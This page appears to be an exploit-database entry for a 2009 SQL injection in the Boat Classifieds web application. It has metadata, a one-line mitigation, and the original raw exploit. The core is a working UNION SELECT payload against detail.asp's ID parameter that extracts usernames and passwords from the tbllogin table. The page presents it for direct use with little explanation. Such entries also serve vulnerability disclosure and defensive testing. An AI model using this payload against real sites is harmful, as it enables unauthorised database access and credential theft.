header-logo
Suggest Exploit
vendor:
Boat Classifieds
by:
Sangteamtham
9,3
CVSS
HIGH
SQL Injection
89
CWE
Product Name: Boat Classifieds
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: No
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2009

Boat Classifieds

Boat Classifieds is vulnerable to SQL Injection. An attacker can exploit this vulnerability to gain access to the database and extract sensitive information such as usernames and passwords.

Mitigation:

Ensure that all user-supplied input is properly sanitized and validated before being used in a SQL query.
Source

Exploit-DB raw data:

Boat Classifieds

####################################################
# Category: Boat Classifieds SQL Injection Vulnerability
# Download: http://www.site2nite.com/boat-webdesign.asp
# Author: Sangteamtham [at] hcegroup[dot]net
# Homepage: HCE group.net
####################################################


Exploit:

http://server/detail.asp?ID=999999 union select
1,2,3,4,5,username,password,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74
from tbllogin " having 1=1--

sangteamtham [at] hcegroup.net

Discovered on Fri, Jul 17, 2009